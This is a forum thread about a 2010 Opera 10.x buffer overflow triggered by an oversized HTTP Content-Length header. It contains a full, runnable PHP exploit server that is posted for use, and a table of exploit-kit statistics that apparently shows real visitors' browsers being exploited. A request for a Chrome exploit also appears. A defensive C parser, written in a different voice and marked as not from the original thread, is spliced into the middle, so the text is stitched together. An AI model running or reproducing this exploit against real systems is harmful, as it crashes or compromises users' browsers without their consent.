
View full version: Opera 10.x


root_sashok
06.03.2010, 23:02
A high-severity vulnerability has been found in Opera 10.x that lets a remote attacker compromise the target system, namely crash the browser or execute arbitrary code on the system with the privileges of the user who launched Opera.

The vulnerability is caused by a buffer overflow resulting from an error in handling HTTP responses that contain a specially crafted Content-Length header. By sending an overly long Content-Length value, an attacker can cause a heap overflow and, as a result, execute arbitrary code on the remote system with the user's privileges, or crash the browser.

At present there is no fix for the bug. It is recommended either not to visit unfamiliar sites in Opera 10.x at all, or to visit them with reduced privileges.

© (http://habrahabr.ru/blogs/infosecurity/86624/)

Curious topic.

BrainDeaD
06.03.2010, 23:18
exploit:

<?php
// Minimal fake HTTP server: accepts one connection from Opera and answers it
// with a response whose Content-Length value is thousands of digits long.
if(strtolower(substr(isset($_ENV['OS']) ? $_ENV['OS'] : '',0,3)) == "win") define('OS','win');
else define('OS','nix');
// The extension registers itself as "sockets" (php_sockets.dll / sockets.so on disk).
if(!extension_loaded('sockets'))
{
    if(((OS == 'win') && (!@dl('php_sockets.dll'))) ||
       ((OS == 'nix') && (!@dl('sockets.so'))))
        die('fatal sockets.[dll/so] '.
            'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
/*Generated by my own fuzzer*/
// Oversized header block; the only field that matters here is Content-Length,
// the rest is fuzzer filler.
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
// Content-Length value as posted: 5490 nines followed by "666" (count taken from
// the forum copy; the spaces in that copy were line-wrapping artifacts, not part
// of the header).
'Content-Length:'.str_repeat('9', 5490).'666'."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
// Listen on port 81 by default; "-port 666" overrides it.
$PORT = 81;
for($i = 1; $i < $argc; $i++)
{
    if(('-port' == $argv[$i]) && isset($argv[$i + 1]) && ((int)$argv[$i + 1] > 0))
        $PORT = (int)$argv[$i + 1];
}
if(!($SOCKET = socket_create_listen($PORT)))
    die('fatal socket init failed'."\r\n");
socket_set_option($SOCKET,SOL_SOCKET,
    SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
echo('SOCKET READY AT PORT '.$PORT."\r\n".
    'Now connect here via opera'."\r\n");
if($CONNECT = socket_accept($SOCKET))
{
    $recv_buffer = null;
    echo('Connection ok '."\r\n");
    // Read only the first 8 bytes of the request ("GET / HT") to confirm a client
    // is there, then push the whole crafted response regardless of what was asked.
    if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
    {
        if(!@socket_write($CONNECT,$EVIL))
        {
            socket_close($CONNECT);
            socket_close($SOCKET);
            die('I cant send payload !'."\r\n");
        }
    }
    else echo('Something wrong with client side'."\r\n");
    usleep(120000); // give the browser time to read the response before closing
    socket_close($CONNECT);
    socket_close($SOCKET);
}
echo('OK ya browser must be death now'."\r\n".
    'Have a nice day lol'."\r\n");
?>

author: Marcin Ressel aka ~echo.
source: securitylab.ru
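The advisory quoted at the top of the thread and the exploit above come down to the same thing: the client trusts a Content-Length value it has never bounded. As an added example, not part of the original post, of Opera, or of Marcin Ressel's code, here is the defensive side in C: a Content-Length parser that accepts only digits, accumulates with an overflow check, refuses anything above a configured cap before any allocation happens, and treats disagreeing duplicate headers as a conflict rather than taking the last one. The cap (MAX_BODY_BYTES), the function names and the sample header block are my own; the 5490-digit figure is my count of the value in the posted exploit.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>

/* Assumed policy value: the largest body this client will buffer; anything
 * above it is rejected before a single byte is allocated. */
#define MAX_BODY_BYTES ((uint64_t)64 * 1024 * 1024)

enum cl_status { CL_OK = 0, CL_MISSING = 1, CL_MALFORMED = -1, CL_TOO_LARGE = -2, CL_CONFLICT = -3 };

/* One token: 1*DIGIT (RFC 7230 3.3.2), accumulated in uint64_t with an explicit
 * overflow check, so thousands of digits can never wrap into a small size. */
static int parse_token(const char *s, size_t n, uint64_t *out)
{
    uint64_t v = 0;
    if (n == 0) return CL_MALFORMED;
    for (size_t i = 0; i < n; i++) {
        if (!isdigit((unsigned char)s[i])) return CL_MALFORMED;
        unsigned d = (unsigned)(s[i] - '0');
        if (v > (UINT64_MAX - d) / 10) return CL_TOO_LARGE;
        v = v * 10 + d;
        if (v > MAX_BODY_BYTES) return CL_TOO_LARGE;          /* fail early */
    }
    *out = v;
    return CL_OK;
}

/* Length-delimited field value.  A comma list is accepted only when every member
 * is identical (the leniency RFC 7230 permits); anything else is ambiguous. */
int parse_content_length_n(const char *val, size_t len, uint64_t *out)
{
    const char *p = val, *end = val + len;
    uint64_t first = 0; int have = 0;
    for (;;) {
        const char *comma = memchr(p, ',', (size_t)(end - p));
        const char *tok = p, *tok_end = comma ? comma : end;
        while (tok < tok_end && (*tok == ' ' || *tok == '\t')) tok++;           /* strip OWS */
        while (tok_end > tok && (tok_end[-1] == ' ' || tok_end[-1] == '\t')) tok_end--;
        uint64_t v;
        int rc = parse_token(tok, (size_t)(tok_end - tok), &v);
        if (rc != CL_OK) return rc;
        if (have && v != first) return CL_CONFLICT;
        first = v; have = 1;
        if (!comma) break;
        p = comma + 1;
    }
    *out = first;
    return CL_OK;
}

/* Walk a raw CRLF header block to its blank line, parsing every Content-Length
 * (name matched case-insensitively).  Disagreeing headers are a conflict, not "last wins". */
int content_length_from_headers(const char *raw, uint64_t *out)
{
    static const char name[] = "content-length:";
    const size_t nlen = sizeof name - 1;
    uint64_t first = 0; int found = 0;
    for (const char *line = raw; *line; ) {
        const char *eol = strstr(line, "\r\n");
        size_t llen = eol ? (size_t)(eol - line) : strlen(line);
        if (llen == 0) break;                                    /* end of header block */
        int match = llen >= nlen;
        for (size_t i = 0; match && i < nlen; i++)
            if (tolower((unsigned char)line[i]) != name[i]) match = 0;
        if (match) {
            uint64_t v;
            int rc = parse_content_length_n(line + nlen, llen - nlen, &v);
            if (rc != CL_OK) return rc;
            if (found && v != first) return CL_CONFLICT;
            first = v; found = 1;
        }
        if (!eol) break;
        line = eol + 2;
    }
    if (!found) return CL_MISSING;
    *out = first;
    return CL_OK;
}

/* Constructed header block modelled on the exploit's response above. */
const char *SAMPLE_HEADERS = "HTTP/1.1 200 ok\r\nContent-Location: file://C:/boot.ini\r\n"
    "content-length: 47022\r\nContent-Range: bytes 21010-47021/47022\r\n\r\n<html>seq_end</html>";

/* Helpers that return plain values so one expression checks a result. */
int status_of(const char *s) { uint64_t v; return parse_content_length_n(s, strlen(s), &v); }
int value_is(const char *s, uint64_t expect) { uint64_t v = 0; return parse_content_length_n(s, strlen(s), &v) == CL_OK && v == expect; }
int headers_status(const char *raw) { uint64_t v; return content_length_from_headers(raw, &v); }
int headers_value_is(const char *raw, uint64_t expect) { uint64_t v = 0; return content_length_from_headers(raw, &v) == CL_OK && v == expect; }

/* Shape of the exploit's value: 5490 nines then "666" (count taken from the forum copy). */
int huge_value_verdict(void)
{
    static char buf[5490 + 4];
    memset(buf, '9', 5490);
    memcpy(buf + 5490, "666", 4);
    return status_of(buf);
}
```

huge_value_verdict() returns CL_TOO_LARGE within the first dozen digits, long before the loop reaches the end of the string, and no size derived from the header ever reaches an allocator. A client that instead runs atoi() or an unchecked strtoul() over the value and hands the result to its buffer code is the kind of mistake that turns an overlong header into a memory-safety bug; the parser above is the check a reviewer would ask for in that code path.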

Pashkela
06.03.2010, 23:32
Browser           Hits  Exploited  Rate %
Chrome 3.0           5          2  40
Chrome 4.0          72         14  19.44
Chrome 4.1           1          0  0
Chrome 5.0           4          1  25
FireFox 3.0.18      50          0  0
FireFox 3.0.3        4          0  0
FireFox 3.0.4        2          0  0
FireFox 3.0.5        4          0  0
FireFox 3.0.6       10          0  0
FireFox 3.5.5       17          1  5.88
FireFox 3.5.6        6          0  0
FireFox 3.5.7       18          2  11.11
FireFox 3.5.8      250          7  2.8
FireFox 3.6        150          8  5.33
MSIE 6.0           242         92  38.02
MSIE 7.0           371         66  17.79
MSIE 8.0           362         64  17.68
Opera 10.00          4          0  0
Opera 10.10          1          0  0
Opera 8.52           1          0  0
Opera 9.10           1          0  0
Opera 9.20           5          0  0
Opera 9.21           8          1  12.5
Opera 9.22           7          2  28.57
Opera 9.23          11          5  45.45
Opera 9.24           4          3  75
Opera 9.25           7          2  28.57
Opera 9.26           8          0  0
Opera 9.27          26          1  3.85
Opera 9.5            1          0  0
Opera 9.50          13          1  7.69
Opera 9.51          21          2  9.52
Opera 9.52          24          4  16.67
Opera 9.60          16          2  12.5
Opera 9.61           1          0  0
Opera 9.62          18          1  5.56
Opera 9.63          40          5  12.5
Opera 9.64          82          4  4.88
Opera 9.80         569         55  9.67


no browser is invulnerable, but the donkey (IE) is on top as always

root_sashok
06.03.2010, 23:40
Opera 9.80 gets hit pretty hard. Didn't expect that.

BrainDeaD
06.03.2010, 23:42
and still, going by the stats Opera is the safest (not counting the older versions)

root_sashok
06.03.2010, 23:44
Official sources claim that 10.50 is no longer exploitable. I'll have to check; for now, Safari.

CardQ
06.03.2010, 23:45
Chrome 4.0 72 14 19.44
What's the exploit for Chrome?

ntldr
07.03.2010, 02:26
remote code execution through this vulnerability is impossible

попугай
07.03.2010, 17:04
And version 10.00, build 1750, does it get hit?

PS the news is about a week old now; have they really not patched the hole yet?

blackybr
07.03.2010, 17:21
the exploit isn't relevant - only DoS + it didn't take down my latest 10.5 build 3296

root_sashok
07.03.2010, 19:49
10.50 doesn't get hit, .10 gets hit every time.

satana-fu
07.03.2010, 20:32
10.50 doesn't get hit, .10 gets hit every time.

scared me so badly that I removed 10.10 and installed 10.50 :mad: